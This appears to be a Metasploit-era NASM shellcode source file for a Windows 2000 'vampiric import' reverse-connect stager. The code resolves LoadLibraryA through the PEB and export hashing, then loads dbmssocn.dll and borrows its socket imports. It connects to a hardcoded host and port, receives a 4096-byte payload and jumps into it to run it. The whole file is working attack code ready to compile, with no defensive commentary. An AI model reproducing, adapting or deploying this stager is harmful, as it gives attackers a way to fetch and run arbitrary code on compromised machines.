135 lines
No EOL
2.8 KiB
NASM
135 lines
No EOL
2.8 KiB
NASM
; Title: Windows 2000 Vampiric Import Reverse Connect
|
|
; Platforms: Windows 2000
|
|
; Function: Attach to dbmssocn.dll, use IAT to connect, read/exec payload
|
|
; Author: hdm[at]metasploit.com
|
|
|
|
; Compile: nasm -f bin -o win2000_vampiric_connector.bin win2000_vampiric_connector.asm
|
|
|
|
|
|
[BITS 32]
|
|
|
|
%define ESIMOD add si, 0x3000
|
|
%define DBMSSOCN_WSAStartup [esi + 0x6C]
|
|
%define DBMSSOCN_connect [esi + 0x4C]
|
|
%define DBMSSOCN_recv [esi + 0x54]
|
|
%define DBMSSOCN_send [esi + 0x5C]
|
|
%define DBMSSOCN_socket [esi + 0x74]
|
|
|
|
; uncomment this for better error handling and persistent reconnects
|
|
; %define NICE
|
|
|
|
global _start
|
|
_start:
|
|
|
|
LKernel32Base:
|
|
push byte 0x30
|
|
pop ecx
|
|
mov eax, [fs:ecx]
|
|
mov eax, [eax + 0x0c]
|
|
mov esi, [eax + 0x1c]
|
|
lodsd
|
|
mov ebp, [eax + 0x08]
|
|
|
|
mov eax, [ebp + 0x3c]
|
|
mov edx, [ebp + eax + 120]
|
|
add edx, ebp
|
|
mov ecx, [edx + 24]
|
|
mov ebx, [edx + 32]
|
|
add ebx, ebp
|
|
|
|
LFinderLoop:
|
|
|
|
%ifdef NICE
|
|
jecxz LNotFound
|
|
%endif
|
|
|
|
dec ecx
|
|
mov esi, [ebx + ecx * 4]
|
|
add esi, ebp
|
|
xor edi, edi
|
|
cld
|
|
|
|
LHasher:
|
|
xor eax, eax
|
|
lodsb
|
|
cmp al, ah
|
|
je short LFound
|
|
ror edi, 13
|
|
add edi, eax
|
|
jmp short LHasher
|
|
|
|
LFound:
|
|
cmp edi, 0xec0e4e8e ; LoadLibraryA
|
|
jnz short LFinderLoop
|
|
mov ebx, [edx + 36]
|
|
add ebx, ebp
|
|
mov cx, [ebx + 2 * ecx]
|
|
mov ebx, [edx + 28]
|
|
add ebx, ebp
|
|
mov eax, [ebx + 4 * ecx]
|
|
add eax, ebp
|
|
jmp short LFinderDone
|
|
|
|
%ifdef NICE
|
|
LNotFound:
|
|
xor eax, eax
|
|
%endif
|
|
|
|
LFinderDone:
|
|
call LoadDBMSSOCN
|
|
|
|
LDataSegment:
|
|
;========================
|
|
db "DBMSSOCN.DLL"
|
|
db 0x00, 0xFF ; second byte only added for easy disasm
|
|
;========================
|
|
|
|
LoadDBMSSOCN:
|
|
call eax ; LoadLibraryA (ptr to dll on stack)
|
|
mov esi, eax ; esi used by all DBMSSOCN functions
|
|
ESIMOD ; inc base to save space on the calls
|
|
xor edi, edi ; edi is just a null
|
|
|
|
LWSAStartup:
|
|
sub sp, 400
|
|
push esp
|
|
push dword 0x101
|
|
call DBMSSOCN_WSAStartup
|
|
|
|
LSocket:
|
|
push edi
|
|
push edi
|
|
push edi
|
|
push edi
|
|
inc edi
|
|
push edi
|
|
inc edi
|
|
push edi
|
|
call DBMSSOCN_socket
|
|
mov ebx, eax
|
|
|
|
LConnect:
|
|
push 0xF700A8C0 ; host: 192.168.0.247
|
|
push 0x11220002 ; port: 8721
|
|
mov ecx, esp
|
|
push byte 0x10
|
|
push ecx
|
|
push ebx
|
|
call DBMSSOCN_connect ; set eax to 0 on success
|
|
|
|
%ifdef NICE
|
|
test eax,eax
|
|
jnz LConnect
|
|
xor eax, eax
|
|
%endif
|
|
|
|
LReadCodeFromSocket:
|
|
add di, 0xffe ; read 4096 bytes of payload (edi == 2)
|
|
sub esp, edi
|
|
mov ebp, esp
|
|
push eax ; flags
|
|
push edi ; length
|
|
push ebp ; buffer
|
|
push ebx ; socket
|
|
call DBMSSOCN_recv ; recv(socket, buffer, length, flags)
|
|
jmp esp ; jump into new payload |